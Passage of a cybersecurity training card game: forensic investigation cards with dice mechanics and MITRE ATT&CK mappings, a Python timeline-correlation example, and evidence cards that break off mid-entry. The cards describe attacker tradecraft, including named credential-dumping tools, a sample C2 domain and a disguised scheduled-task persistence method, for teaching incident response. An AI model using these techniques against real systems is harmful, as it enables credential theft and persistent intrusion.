║ - Lateral movement pattern (login on A → login on B → etc) ║
║ - Privilege escalation sequence (user to admin to system) ║
║ - Command execution across systems ║
║ - Network connections (firewall → host activity) ║
║ - Timeline of data access and exfiltration ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13): ║
║ Discover ONE Evidence card from: Lateral Movement Pattern, ║
║ Complete Attack Timeline, or Attacker Command Sequence. ║
║ Advance (only if no Evidence card produced): ║
║ Timeline Completeness +20%, Attack Chain +25% ║
║ ║
║ PARTIAL SUCCESS (roll 11-12): ║
║ Discover partial timeline (some systems missing logs). ║
║ Advance: Timeline Completeness +15%, Attack Chain +10% ║
║ ║
║ FAILURE (roll < 11): ║
║ Too many log gaps; timeline cannot be reliably correlated. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Correlation requires clear documentation of methodology. ║
║ Chain of Custody: Strong if SIEM tool provided audit trail. ║
║ ✓ Admissible if correlation process is documented clearly ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has SIEM administration (Splunk, ArcSight) ║
║ +1 if LOG-01 already completed (building on prior analysis) ║
║ +1 if detailed explanation of correlation methodology ║
║ +2 if team provides narrative of suspected attacker movements ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Most valuable for understanding "how" attacker moved ║
║ • Reveals attack pace and duration (dwell time) ║
║ • Can expose failed lateral movement attempts ║
║ • Requires multiple systems to have logging enabled ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ NET-01: NETWORK TRAFFIC ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Packet Capture & Flow Analysis ║
║ MITRE ATT&CK: T1041 (Exfiltration Over C2), T1048 (Alternative ║
║ Protocol), T1071 (Application Layer Protocol) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12 ║
║ Budget Cost: 10 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Analyze network traffic captures (PCAP) or network flow records║
║ (NetFlow) to identify communication patterns, exfiltration ║
║ evidence, and command-and-control connections. Uses tools like ║
║ Wireshark, Zeek, or commercial traffic analysis platforms. ║
║ ║
║ What You're Looking For: ║
║ - Unusual outbound connections (C2 domains, IPs) ║
║ - Large data transfers (exfiltration evidence) ║
║ - Encrypted tunnels (VPN, proxy connections) ║
║ - DNS queries for suspicious domains ║
║ - HTTP user agents inconsistent with legitimate software ║
║ - Beacon-like patterns (regular connection attempts) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12): ║
║ Discover ONE Evidence card from: C2 Server Evidence, ║
║ Exfiltration Traffic Pattern, or Suspicious Domain Lookup. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Attribution +15% ║
║ ║
║ PARTIAL SUCCESS (roll 10-11): ║
║ Discover suspicious traffic but destination unclear. ║
║ Advance: Attack Chain +10%, Attribution +5% ║
║ ║
║ FAILURE (roll < 10): ║
║ Traffic too encrypted or obfuscated; cannot analyze. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ PCAP files must include timestamp and collection metadata. ║
║ Chain of Custody: Strong if collected from router/IDS. ║
║ ✓ Admissible (widely accepted for network evidence) ║
║ ⚠ Encrypted traffic reveals patterns but not content ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has Wireshark/packet analysis certification ║
║ +1 if network engineering background ║
║ +1 if Threat Attribution evidence already discovered ║
║ -1 if traffic is heavily encrypted or anonymized ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Reveals attacker communication patterns ║
║ • Can identify C2 infrastructure ║
║ • Exfiltration volume is critical evidence ║
║ • Encrypted traffic is harder to analyze but patterns visible ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ NET-02: PACKET CAPTURE DEEP ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced Protocol Forensics & Reconstruction ║
║ MITRE ATT&CK: T1557 (Adversary-in-the-Middle), T1040 (Network ║
║ Sniffing), T1071 (Application Layer Protocol) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14 ║
║ Budget Cost: 15 ║
║ Duration: 3 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Deep packet inspection including protocol reconstruction ║
║ (rebuilding HTTP streams, email messages, file transfers from ║
║ packet payloads), malware traffic analysis, and detection of ║
║ exploitation attempts in traffic. Requires advanced networking ║
║ and protocol knowledge. ║
║ ║
║ What You're Looking For: ║
║ - Reconstructed HTTP/S traffic (actual data transferred) ║
║ - Exploitation payloads in network traffic (shellcode, etc) ║
║ - Malware command protocols (custom C2 protocols) ║
║ - Authentication attempts (credentials in transit) ║
║ - Man-in-the-middle evidence (SSL/TLS downgrade, cert mismatches)║
║ - Attacker reconnaissance traffic patterns ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14): ║
║ Discover TWO Evidence cards from: Exploitation Traffic, ║
║ C2 Protocol Details, or Attacker Reconnaissance Pattern. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +25%, Attribution +25% ║
║ ║
║ PARTIAL SUCCESS (roll 12-13): ║
║ Discover ONE complete evidence + incomplete second. ║
║ Advance: Attack Chain +15%, Attribution +10% ║
║ ║
║ FAILURE (roll < 12): ║
║ Encryption or obfuscation prevents useful reconstruction. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ PCAP reconstruction must document decoding methodology. ║
║ Chain of Custody: Moderate (depends on decoding assumptions). ║
║ ⚠ If encrypted traffic decoded, must explain decryption method║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has network forensics certification ║
║ +2 if protocol reverse engineering experience ║
║ +1 if NET-01 already completed (building on analysis) ║
║ -2 if traffic is encrypted and keys not recovered ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Most detailed network analysis (3 turns) ║
║ • Requires protocol expertise (HTTP, DNS, custom protocols) ║
║ • Reveals actual attacker commands and data stolen ║
║ • Challenging when traffic is encrypted ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ MALW-01: MALWARE ANALYSIS (DYNAMIC) ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Behavioral Malware Analysis ║
║ MITRE ATT&CK: T1518 (Software Discovery), T1082 (System Info), ║
║ T1012 (Query Registry), T1033 (System Owner/User) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12 ║
║ Budget Cost: 15 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Execute malware samples in an isolated sandbox environment ║
║ and record their behavior. Monitor file system changes, registry║
║ modifications, network connections, and process creation to ║
║ understand what the malware does without reverse engineering. ║
║ Uses tools like Cuckoo, Any.run, or commercial sandboxes. ║
║ ║
║ What You're Looking For: ║
║ - File system changes (what files created/modified) ║
║ - Registry modifications (persistence mechanisms) ║
║ - Network communications (DNS, HTTP, etc connections) ║
║ - Process creation (child processes, injections) ║
║ - System enumeration (reconnaissance activity) ║
║ - Anti-analysis techniques (checks for sandbox) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12): ║
║ Discover ONE Evidence card from: Malware Behavior Profile, ║
║ Persistence Mechanism Created, or C2 Callback Observed. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Attribution +10% ║
║ ║
║ PARTIAL SUCCESS (roll 10-11): ║
║ Malware behavior observed but some details unclear. ║
║ Advance: Attack Chain +10%, Attribution +5% ║
║ ║
║ FAILURE (roll < 10): ║
║ Malware detects sandbox; exhibits anti-analysis behavior. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Sandbox execution creates video/log recordings of behavior. ║
║ Chain of Custody: Strong if sandbox logs are preserved. ║
║ ✓ Admissible (widely accepted malware analysis evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has GREM (GIAC Reverse Engineering Malware) ║
║ +1 if incident responder with malware analysis training ║
║ +1 if detailed explanation of behavioral analysis approach ║
║ -1 if malware implements anti-sandbox techniques ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Safer than static analysis (execution is isolated) ║
║ • Reveals "what the malware does" not "how it works" ║
║ • Complements Static Analysis (MALW-02) well ║
║ • Useful for identifying persistence and C2 behavior ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ MALW-02: MALWARE ANALYSIS (STATIC) ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Code Reverse Engineering & Analysis ║
║ MITRE ATT&CK: T1140 (Deobfuscate/Decode Files), T1027 ║
║ (Obfuscated Files or Information), T1071 ║
║ (Application Layer Protocol) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14 ║
║ Budget Cost: 10 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Disassemble and analyze malware code without execution using ║
║ reverse engineering tools (IDA Pro, Ghidra, Binary Ninja, etc).║
║ Examine assembly code, strings, imports, and code structure to ║
║ understand attacker capabilities and techniques. Requires ║
║ assembly language and debugging expertise. ║
║ ║
║ What You're Looking For: ║
║ - Hardcoded C2 servers, encryption keys ║
║ - Malware capabilities (spyware, RAT, backdoor, etc) ║
║ - Obfuscation techniques (packing, encryption, polymorphism) ║
║ - Code similarities to known malware families ║
║ - Exploit codes (zero-days, known CVEs) ║
║ - Attacker identity clues (developer name, code style) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14): ║
║ Discover ONE Evidence card from: Malware Source Code Analysis, ║
║ Hardcoded C2 Server, or Code Similarity to Known Family. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Attribution +25% ║
║ ║
║ PARTIAL SUCCESS (roll 12-13): ║
║ Understand some code features but full analysis incomplete. ║
║ Advance: Attack Chain +10%, Attribution +10% ║
║ ║
║ FAILURE (roll < 12): ║
║ Malware is heavily obfuscated; code analysis inconclusive. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Reverse engineering analysis is documented with screenshots ║
║ Chain of Custody: Moderate (interpretation-dependent). ║
║ ⚠ Conclusions must be clearly explained for admissibility ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +3 if investigator has GREM (GIAC Reverse Engineering Malware) ║
║ +2 if assembly language and debugging expertise ║
║ +1 if MALW-01 already completed (building on behavioral findings)║
║ +1 if detailed explanation of reverse engineering approach ║
║ -2 if malware is polymorphic/heavily obfuscated ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Highest skill requirement (DC 14) ║
║ • Reveals "how the malware works" ║
║ • Can identify code reuse and attacker patterns ║
║ • Complements Behavior Analysis (MALW-01) well ║
║ • Time-consuming (2 turns represents weeks of analysis) ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ TIMELINE-01: TIMELINE RECONSTRUCTION ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Event Correlation & Chronological Analysis ║
║ MITRE ATT&CK: T1074 (Data Staged), T1087 (Account Discovery), ║
║ T1046 (Network Service Discovery) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13 ║
║ Budget Cost: 5 ║
║ Duration: 1 turn ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Synthesize evidence from multiple sources (logs, timestamps, ║
║ file metadata, malware analysis) into a unified chronological ║
║ timeline of the attack. Identify sequence of events, dwell ║
║ time, and decision points. ║
║ ║
║ What You're Looking For: ║
║ - Entry point and initial compromise time ║
║ - Privilege escalation points and timing ║
║ - Lateral movement sequence ║
║ - Data reconnaissance timeline ║
║ - Exfiltration timing (when, how much, for how long) ║
║ - Dwell time (how long attacker in network before detection) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13): ║
║ Discover ONE Evidence card: Complete Attack Timeline with ║
║ key decision points and transitions between phases identified. ║
║ Advance (only if no Evidence card produced): ║
║ Timeline Completeness +25%, Attack Chain +15% ║
║ ║
║ PARTIAL SUCCESS (roll 11-12): ║
║ Partial timeline with some events missing or unclear. ║
║ Advance: Timeline Completeness +15%, Attack Chain +10% ║
║ ║
║ FAILURE (roll < 11): ║
║ Too many timestamp discrepancies; timeline unreliable. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Timeline must reference source evidence for each event. ║
║ Chain of Custody: Strong if well-documented and cross-referenced║
║ ✓ Admissible if timeline sources are cited ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator is DFIR (Digital Forensics & Incident Response)║
║ +1 if LOG-01 or LOG-02 already completed ║
║ +2 if detailed explanation synthesizes multiple evidence sources║
║ +1 if team notes discrepancies and explains them ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Critical for understanding attack progression ║
║ • Cheap (5 budget) but requires multiple prior investigations ║
║ • Fast (1 turn) but depends on prior evidence collection ║
║ • Foundation for narrative reconstruction of incident ║
╚════════════════════════════════════════════════════════════════╝
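As an added illustration of what TIMELINE-01 asks the team to do (this is example code, not part of the Incident Zero game materials), the following Python merges constructed evidence rows from several sources into one UTC timeline, computes dwell time, and flags sources that disagree about the same artifact instead of silently correcting them. Every source name, timestamp, artifact key and the local-zone assumption for the Windows hosts is constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from itertools import combinations


@dataclass(frozen=True)
class Event:
    when: datetime      # timezone-aware, normalized to UTC
    source: str         # evidence source cited for this event (chain of custody)
    phase: str          # attack phase the event is assigned to
    artifact: str       # key shared by sources that describe the same artifact
    detail: str


def normalize(raw: str, assumed_tz: timezone) -> datetime:
    """Parse an ISO-8601 timestamp.  Naive values (no offset) are read in
    the zone the source is documented to log in, then converted to UTC."""
    dt = datetime.fromisoformat(raw)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=assumed_tz)
    return dt.astimezone(timezone.utc)


# Assumption for the example: the Windows hosts log in local time, UTC-4.
EASTERN = timezone(timedelta(hours=-4))

# Constructed sample evidence: source -> (documented zone, rows of
# (timestamp, phase, artifact, detail)).  Not taken from any real incident.
SOURCES = {
    "mail-gateway": (timezone.utc, [
        ("2024-10-12T14:03:00+00:00", "initial-compromise", "mail-7731",
         "phishing message delivered to finance user"),
    ]),
    "windows-security-log": (EASTERN, [
        ("2024-10-15 03:22:15", "privilege-escalation", "rdp-admin-192.0.2.100",
         "Administrator logon from 192.0.2.100 over RDP"),
        ("2024-10-15 03:40:02", "persistence", "task-windows_update_service",
         "scheduled task Windows_Update_Service registered"),
    ]),
    "perimeter-firewall": (timezone.utc, [
        ("2024-10-15T03:22:10+00:00", "privilege-escalation", "rdp-admin-192.0.2.100",
         "inbound TCP/3389 from 192.0.2.100 permitted"),
    ]),
    "task-xml-metadata": (timezone.utc, [
        ("2024-10-15T07:40:05+00:00", "persistence", "task-windows_update_service",
         "task XML created under System32\\Tasks"),
    ]),
    "edr-console": (timezone.utc, [
        ("2024-10-18T09:15:00+00:00", "detection", "edr-alert-1",
         "alert: credential dumper signature on FILESRV01"),
    ]),
}


def build_timeline(sources=SOURCES) -> list:
    """Merge every source into one chronological list of UTC events."""
    events = []
    for source, (zone, rows) in sources.items():
        for raw, phase, artifact, detail in rows:
            events.append(Event(normalize(raw, zone), source, phase, artifact, detail))
    return sorted(events, key=lambda e: e.when)


def dwell_time(timeline) -> timedelta:
    """Time from the earliest attacker activity to the first detection event."""
    first_activity = min(e.when for e in timeline if e.phase != "detection")
    first_detection = min(e.when for e in timeline if e.phase == "detection")
    return first_detection - first_activity


def find_discrepancies(timeline, tolerance=timedelta(minutes=5)):
    """Return (event_a, event_b, gap) for sources that describe the same
    artifact but disagree by more than tolerance.  A gap close to a whole
    number of hours usually means one source logs in a different zone than
    documented; the team has to explain it, not quietly shift the data."""
    by_artifact = {}
    for e in timeline:
        by_artifact.setdefault(e.artifact, []).append(e)
    flagged = []
    for group in by_artifact.values():
        for a, b in combinations(group, 2):
            gap = abs(a.when - b.when)
            if gap > tolerance:
                flagged.append((a, b, gap))
    return flagged


if __name__ == "__main__":
    tl = build_timeline()
    for e in tl:
        print(f"{e.when:%Y-%m-%d %H:%M:%S}Z  {e.phase:<20} {e.source:<22} {e.detail}")
    print("dwell time:", dwell_time(tl))
    for a, b, gap in find_discrepancies(tl):
        print(f"DISCREPANCY {a.artifact}: {a.source} vs {b.source} differ by {gap}")
```

Run as written, the firewall and the Windows log disagree by just over four hours on the same RDP logon, which is exactly the kind of discrepancy the card's failure line and the "+1 if team notes discrepancies" modifier are about; the task registration and the task XML file agree within seconds and are not flagged.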
╔════════════════════════════════════════════════════════════════╗
║ THREAT-01: THREAT ATTRIBUTION ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Threat Intelligence & Attribution ║
║ MITRE ATT&CK: G#### group / S#### software identification ║
║ Requires synthesis of all prior evidence ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 15 ║
║ Budget Cost: 20 ║
║ Duration: 3 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Synthesize all collected evidence (malware, infrastructure, ║
║ tactics, timeline) to attribute the attack to a ║
║ known threat group, nation-state, or attacker profile. Includes║
║ cross-referencing with threat intelligence databases, academic ║
║ papers, and law enforcement data. This is the highest-level ║
║ attribution analysis. ║
║ ║
║ What You're Looking For: ║
║ - Similar attacks in CTI databases (VirusTotal, OSINT, etc) ║
║ - Malware signatures matching known threat groups ║
║ - Tactics & Techniques (TTPs) matching known profiles ║
║ - Infrastructure (domains, IPs) linked to known campaigns ║
║ - Language/coding style hints about attacker origin ║
║ - Geolocation clues from timestamps and infrastructure ║
║ - Victim profile matching known group targeting patterns ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 15): ║
║ Discover ONE Evidence card: Threat Attribution Report with ║
║ confidence level (60-90%) linking to specific threat group. ║
║ Advance (only if no Evidence card produced): ║
║ Attribution Confidence +35%, Attack Chain +10% ║
║ ║
║ PARTIAL SUCCESS (roll 13-14): ║
║ Partial attribution (likely group/profile but not 100% certain)║
║ Advance: Attribution Confidence +25%, Attack Chain +5% ║
║ ║
║ FAILURE (roll < 13): ║
║ Insufficient evidence for reliable attribution. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Attribution must cite specific evidence for each finding. ║
║ Chain of Custody: Moderate (depends on CTI source reliability) ║
║ ⚠ Confidence level must be documented (70% vs. 90% certainty) ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has threat intelligence background ║
║ +1 if access to premium CTI services (CrowdStrike, Mandiant) ║
║ +1 per prior investigation showing strong evidence patterns ║
║ +2 if detailed narrative synthesizes multiple evidence sources ║
║ -2 if evidence is sparse or conflicting ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Highest difficulty (DC 15) requires extensive prior evidence ║
║ • Cannot be done until sufficient evidence collected ║
║ • Most valuable action for reaching Victory Condition 1 ║
║ • Attribution confidence matters: 60% vs. 95% is significant ║
║ • Final step in forensic investigation ║
╚════════════════════════════════════════════════════════════════╝
Materials Needed:
- Cardstock (250 gsm minimum)
- Card sleeves (optional but recommended)
- Scissors or guillotine cutter
- Ruler and cutting mat
Printing Instructions:
1. Print each card on heavy cardstock (250 gsm)
2. Cut along the border (approx. 3.5" x 5.5" for standard card size)
3. Optional: Laminate for durability
4. Optional: Sleeve cards for shuffling and handling
PDF Layout: [Card layout with 4-6 cards per page will be generated separately in printable PDF format]
Pathway 1: Quick Start (Turns 1-3) - LOG-01 (Event Log Analysis) → Timeline Reconstruction → Identify key events
Pathway 2: Deep Evidence (Turns 1-5) - DISK-01 (Disk Image) → MALW-01 (Dynamic Analysis) → MALW-02 (Static Analysis) → Understand full malware
Pathway 3: Network-Based (Turns 1-5) - LOG-01 (Initial timeline) → NET-01 (Network Traffic) → NET-02 (Deep Packet Analysis) → Reconstruct C2
Pathway 4: Attribution (Turns 1-6) - MALW-01/02 → NET-01 → THREAT-01 → Complete attribution with infrastructure evidence
Q: Can I do these investigations in any order? A: Yes, but some combinations are more efficient. Multiple investigations often support each other.
Q: What's the DC difficulty based on? A: Skill required. Easier investigations (LOG-01, TIMELINE-01) have DC 11-13. Complex investigations (MEM-02, THREAT-01) have DC 14-15.
Q: Why do some investigations take 3 turns? A: They represent weeks of real forensic work compressed into game turns. Mechanically (v2.2): pay the cost and use your action on the turn you start; the roll and results arrive at the start of the turn the Duration completes. Only one multi-turn investigation may be in flight at a time.
Q: What modifiers apply to my roll? A: Skill (+1 to +3), narrative explanation (+1 to +2), prior investigations (+1), challenge circumstances (-1 to -2).
cards/forensics/core-deck/evidence-cards.md
Version: 2.2 - Playtest Edition
Card Count: 12 Evidence Cards + 4 Findings Cards = 16 Total
Printable: Yes
Evidence Cards represent specific findings discovered during forensic investigations. They document what was found, how it was found, and what investigative leads it provides.
Findings Cards represent conclusions drawn from the evidence—these feed recommendations into Hardening, Network Building, and Audit modules.
Chain of Custody rule (v2.2): +5% Chain of Custody every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); the TO may award +10% for exemplary handling. This stacks with any Chain of Custody impact printed on the card.
No Double Counting (v2.2): When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed "Impact on Progress Meters" (plus the Chain of Custody handling bonus above). The investigation card's own advance line applies only when no Evidence card is produced (e.g., partial success).
Each Evidence Card includes:
- Card ID: Unique identifier (EVD-01 through EVD-12)
- Type: Category of evidence (Malware, Credentials, Movement, Exfiltration, Infrastructure, Timeline)
- Title: Specific finding name
- MITRE ATT&CK: Technique this evidence relates to
- Description: What was found and where
- Discovery Source: Which Investigation Action cards typically find this evidence
- Chain of Custody: Admissibility rating (Strong/Moderate/Weak)
- Investigative Lead: What the team can do next with this finding
- Connection to Attack: Links to threat cards and attack phases
╔════════════════════════════════════════════════════════════════╗
║ EVD-01: CREDENTIAL DUMPER MALWARE ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence ║
║ MITRE ATT&CK: T1003 (OS Credential Dumping), T1556 (Modify Auth)║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Malware sample recovered from compromised system that dumps ║
║ user credentials (SAM file, LSASS process, password hashes, ║
║ or Kerberos tickets). Examples: Mimikatz, PwDump, LaZagne. ║
║ ║
║ Where It Was Found: ║
║ - In System32 directory (hidden with attributes) ║
║ - In %Temp% directory (temporary staging) ║
║ - In admin user AppData (stealth installation) ║
║ ║
║ What It Reveals: ║
║ - Attacker objective: Privilege escalation ║
║ - Persistence vector: Credential harvesting ║
║ - Attack phase: Privilege escalation → lateral movement ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Binary file can be hashed (MD5, SHA-1, SHA-256) ║
║ - File timestamps document creation/modification ║
║ - Admissible in court with hash validation ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - DISK-01/DISK-02: Found as file artifact ║
║ - MEM-01/MEM-02: Found as running process in memory ║
║ - MALW-01: Behavior shows credential dumping actions ║
║ - MALW-02: Code analysis identifies dumping capabilities ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We found a credential dumper. Let's analyze its behavior ║
║ (MALW-01) to understand exactly what credentials were captured.║
║ Then we can assume those accounts are compromised." ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +15% (shows escalation phase) ║
║ - Attribution: +10% (dumper choice shows attacker sophistication)║
║ - Timeline: +10% (timestamp shows when escalation occurred) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Implement credential guard to prevent dumping" ║
║ → NETWORK BUILDING: "Isolate admin credentials in PAW" ║
║ → AUDIT: "Verify controls around credential access logging" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-02: C2 CALLBACK DOMAIN ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Infrastructure ║
║ MITRE ATT&CK: T1071 (Application Layer Protocol), T1573 (Encrypted║
║ Channel), T1008 (Fallback Channels) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Domain name or IP address that malware communicates with for ║
║ command and control. Examples: ║
║ - checkupdate.ru (looks legitimate but is attacker-controlled) ║
║ - 192.0.2.45 (direct IP address) ║
║ ║
║ Where It Was Found: ║
║ - In malware strings (hardcoded in binary) ║
║ - In network traffic (outbound connections) ║
║ - In memory (communication buffers) ║
║ - In DNS logs (DNS queries) ║
║ ║
║ What It Reveals: ║
║ - Attacker still has access (if domain still active) ║
║ - C2 infrastructure operator (may be reused for other campaigns)║
║ - Attack sophistication (legitimate-looking domain = higher skill)║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Network logs document domain/IP communication ║
║ - PCAP files timestamp the traffic ║
║ - DNS logs show query history ║
║ - Admissible with supporting traffic analysis ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - MALW-01: Dynamic analysis shows C2 connections ║
║ - MALW-02: Static analysis finds hardcoded domains ║
║ - NET-01: Network traffic analysis identifies unusual domains ║
║ - NET-02: Deep packet inspection reconstructs C2 commands ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We found the C2 domain. Let's do THREAT-01 analysis to: ║
║ - WHOIS lookup (registrant info) ║
║ - Historical DNS records (see past resolutions) ║
║ - Infrastructure mapping (what else is hosted on this IP?) ║
║ - Passive DNS (VirusTotal, Shodan, etc)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +15% (confirms persistence vector) ║
║ - Attribution: +25% (infrastructure links to threat group) ║
║ - Timeline: +5% (timestamps when C2 was active) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Block C2 domain via firewall, DNS sinkhole" ║
║ → NETWORK BUILDING: "Implement egress filtering to C2 ranges" ║
║ → AUDIT: "Review firewall rules for C2 domain blocking" ║
║ ║
║ THREAT INTEL: ║
║ Can be shared with ISP/CISA for coordinated takedown/blocking. ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-03: PERSISTENCE MECHANISM (SCHEDULED TASK) ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence ║
║ MITRE ATT&CK: T1053 (Scheduled Task/Job), T1543 (Create/Modify ║
║ System Process) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Scheduled task or cron job configured to execute malware at ║
║ regular intervals (hourly, daily, on system startup). Ensures ║
║ malware runs even if process is killed or system reboots. ║
║ ║
║ Example: ║
║ - Task: "Windows_Update_Service" (disguised name) ║
║ - Runs: System startup + every 4 hours ║
║ - Executes: C:\Windows\System32\msupd.exe (hidden location) ║
║ ║
║ What It Reveals: ║
║ - Attacker skill level (simple but effective) ║
║ - Intent: Long-term access/persistence ║
║ - Sophistication: Low-to-medium (persistence is basic) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Task definition stored in XML (Windows registry/filesystem) ║
║ - Can be exported and hashed ║
║ - Creation/modification timestamps available ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - DISK-01: Task files in Windows registry/filesystem ║
║ - LOG-01: Task execution appears in logs ║
║ - MEM-01: Task execution visible in running processes ║
║ - MALW-01: Dynamic analysis shows task creation ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We found a scheduled task executing malware. Key questions: ║
║ - When was this task created? (timestamp analysis) ║
║ - What executable does it run? (acquire and analyze - MALW-01) ║
║ - Is the executable still present? (filesystem search) ║
║ - Is the task still active? (persistence threat)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +20% (clearly shows persistence phase) ║
║ - Timeline: +15% (task timestamps show when persistence installed)║
║ - Attribution: +5% (persistence technique is common) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Implement AppLocker/code signing for scheduled ║
║ task executables" ║
║ → NETWORK BUILDING: "Enable scheduled task logging and analysis"║
║ → AUDIT: "Verify controls on scheduled task creation" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-04: SUSPICIOUS ADMIN LOGIN (TIMELINE) ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Credentials & Access ║
║ MITRE ATT&CK: T1078 (Valid Accounts), T1021 (Remote Services), ║
║ T1550 (Use Alternate Authentication Material) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Administrator account login with suspicious characteristics: ║
║ - Unusual time (3 AM instead of business hours) ║
║ - Unusual location (different country/VPN) ║
║ - Unusual source (remote desktop instead of VPN) ║
║ - Batch processing (multiple logins in seconds) ║
║ ║
║ Example Log Entry: ║
║ 2024-10-15 03:22:15 - User: Administrator ║
║ Source: 192.0.2.100 (Russia) ║
║ Protocol: RDP / SSH ║
║ Success: Yes ║
║ ║
